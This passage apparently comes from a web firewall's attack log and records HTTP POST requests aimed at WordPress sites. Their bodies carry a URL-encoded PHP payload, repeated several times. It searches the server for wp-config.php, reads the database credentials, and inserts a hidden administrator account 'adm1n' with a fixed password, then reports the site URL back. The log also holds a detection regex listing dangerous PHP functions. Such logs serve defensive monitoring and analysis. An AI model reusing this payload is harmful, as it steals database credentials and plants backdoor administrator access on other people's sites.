C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/network\/plugins.php HTTP\/1.1\ncookie:4=730da3e67a08a749df0620450f4abf2e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvG0LvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWypKIyp3EmVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\ncontent-length:12640\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nOF=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:08:34","213.209.159.254","POST","\/","Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> vY:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%2